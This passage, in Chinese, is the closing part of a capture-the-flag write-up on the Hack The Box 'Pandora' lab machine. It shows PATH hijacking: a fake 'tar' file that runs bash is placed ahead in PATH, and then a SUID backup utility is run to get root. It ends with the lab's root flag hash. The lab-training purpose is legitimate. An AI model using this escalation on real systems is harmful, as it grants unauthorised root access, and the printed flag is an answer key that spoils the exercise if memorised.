切换到matt的用户目录,然后创建一个假的tar可执行文件,,并将matt的家路径注入PATH变量中

cd /home/matt/
echo "/bin/bash" > tar
chmod +x tar
export PATH=/home/matt:$PATH

然后运行/usr/bin/pandora_backup文件

[email protected]:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
[email protected]:~# whoami&&id
root
uid=0(root) gid=1000(matt) groups=1000(matt)

成功提权到root用户

[email protected]:~# cd /root
[email protected]:/root# ls
root.txt
[email protected]:/root# cat root.txt 
262d5cfca2599a11b0c1dcfa552a150e

成功拿到root权限的flag文件


原文始发于微信公众号(路西菲尔的故事汇):Hackthebox - Pandora 靶场实战

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月23日01:08:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Hackthebox - Pandora 靶场实战 https://cn-sec.com/archives/1040134.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: